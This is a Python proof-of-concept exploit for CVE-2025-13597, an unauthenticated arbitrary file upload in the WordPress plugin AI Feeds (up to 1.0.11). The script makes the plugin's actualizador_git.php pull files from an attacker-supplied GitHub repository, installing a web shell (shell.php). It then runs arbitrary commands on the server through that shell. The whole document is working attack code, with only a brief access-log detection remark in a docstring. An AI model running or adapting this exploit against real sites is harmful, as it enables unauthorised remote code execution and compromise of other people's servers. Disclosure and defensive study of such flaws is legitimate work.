# Exploit Title: AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload
# Date: 11/22/2025
# Exploit Author: Ryan Kozak
# Vendor Homepage: https://ai.cibeles.net/
# Version: <= 1.0.11
# CVE : CVE-2025-13597
import argparse
import requests
def exploit(target, owner, repo, token, command):
    """Issue the two HTTP requests that make up this proof of concept.

    Step one is a GET to ``actualizador_git.php`` under the plugin directory
    carrying ``owner``, ``repo``, ``ref`` (fixed to ``main``) and ``token`` as
    query parameters; step two is a GET to ``shell.php`` in the same directory
    with ``cmd`` set to ``command``. Both response bodies are printed verbatim
    and neither status code is checked, so the closing "should be accessible"
    message is printed regardless of outcome.

    Detection note: the request pair ``actualizador_git.php?owner=…&repo=…``
    followed by ``shell.php?cmd=…`` beneath ``wp-content/plugins/ai-feeds/`` is
    the access-log pattern this script produces. ``target`` is used as a plain
    URL prefix and is not normalised (a trailing slash would yield ``//``).
    """
    plugin_base = f"{target}/wp-content/plugins/ai-feeds"

    print("[*] Exploiting actualizador_git.php vulnerability...")
    print(f"[*] Downloading and installing shell from GitHub repository: {owner}/{repo}")
    # NOTE(review): the token is sent in the query string, so it will typically
    # be recorded in web-server and proxy access logs on both ends.
    fetch_query = dict(owner=owner, repo=repo, ref='main', token=token)
    reply = requests.get(f"{plugin_base}/actualizador_git.php", params=fetch_query, timeout=30)
    print(reply.text.strip())
    print("\n[*] Exploit executed. Checking if shell.php was created...\n")

    print("[*] Testing shell access...")
    reply = requests.get(f"{plugin_base}/shell.php", params={'cmd': command}, timeout=10)
    print(reply.text.strip())
    print("\n")
    print("[*] Shell should be accessible at:")
    print(f" {plugin_base}/shell.php?cmd=COMMAND")
def main():
    """Parse the command line and forward the values to :func:`exploit`.

    Required options: ``-t/--target``, ``-o/--owner``, ``-r/--repo``,
    ``-k/--token``. Optional: ``-c/--command`` (defaults to ``whoami``).
    Options are registered in the same order as before so ``--help`` output
    is unchanged.
    """
    cli = argparse.ArgumentParser()
    # (short flag, long flag, help text) for every mandatory option.
    required_options = [
        ('-t', '--target', 'Target URL'),
        ('-o', '--owner', 'GitHub repository owner'),
        ('-r', '--repo', 'GitHub repository name'),
        ('-k', '--token', 'GitHub Personal Access Token'),
    ]
    for short_flag, long_flag, description in required_options:
        cli.add_argument(short_flag, long_flag, required=True, help=description)
    cli.add_argument('-c', '--command', default='whoami', help='Command to execute (default: whoami)')

    opts = cli.parse_args()
    exploit(opts.target, opts.owner, opts.repo, opts.token, opts.command)
# Script entry point: only run when executed directly, not when imported.
if __name__ == "__main__":
    main()